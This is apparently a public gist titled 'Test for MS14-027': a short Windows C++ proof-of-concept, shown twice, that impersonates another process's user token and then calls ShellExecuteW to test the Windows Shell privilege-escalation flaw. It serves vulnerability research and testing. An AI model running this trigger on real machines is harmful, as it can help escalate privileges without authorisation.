tyranid/Test for MS14-027

## Test for MS14-027
#include <stdio.h>
#include <tchar.h>
#include <Windows.h>

int wmain(int argc, WCHAR* argv[])
{
	if (argc < 2)
	{
		printf("Usage: ImpersonateSHExec filename [sessionid]\n");
		return 1;
	}

	CoInitialize(nullptr);

	if (argc > 2)
	{
		DWORD pid = wcstoul(argv[2], 0, 0);
		HANDLE hProcess;
		HANDLE hToken;

		hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);

		if (hProcess == nullptr)
		{
			printf("Error opening process %d\n", GetLastError());
			return 1;
		}

		if (!OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &hToken))
		{
			printf("Error getting user token %d\n", GetLastError());
			return 1;
		}

		if(!ImpersonateLoggedOnUser(hToken))
		{
			printf("Error impersonating user token %d\n", GetLastError());
			return 1;
		}
	}

	printf("Return: %d\n", ShellExecuteW(nullptr, L"open", argv[1], L"", nullptr, SW_SHOW));

	CoUninitialize();

	return 0;
}
	#include <stdio.h>
	#include <tchar.h>
	#include <Windows.h>

	int wmain(int argc, WCHAR* argv[])
	{
	if (argc < 2)
	{
	printf("Usage: ImpersonateSHExec filename [sessionid]\n");
	return 1;
	}

	CoInitialize(nullptr);

	if (argc > 2)
	{
	DWORD pid = wcstoul(argv[2], 0, 0);
	HANDLE hProcess;
	HANDLE hToken;

	hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);

	if (hProcess == nullptr)
	{
	printf("Error opening process %d\n", GetLastError());
	return 1;
	}

	if (!OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &hToken))
	{
	printf("Error getting user token %d\n", GetLastError());
	return 1;
	}

	if(!ImpersonateLoggedOnUser(hToken))
	{
	printf("Error impersonating user token %d\n", GetLastError());
	return 1;
	}
	}

	printf("Return: %d\n", ShellExecuteW(nullptr, L"open", argv[1], L"", nullptr, SW_SHOW));

	CoUninitialize();

	return 0;
	}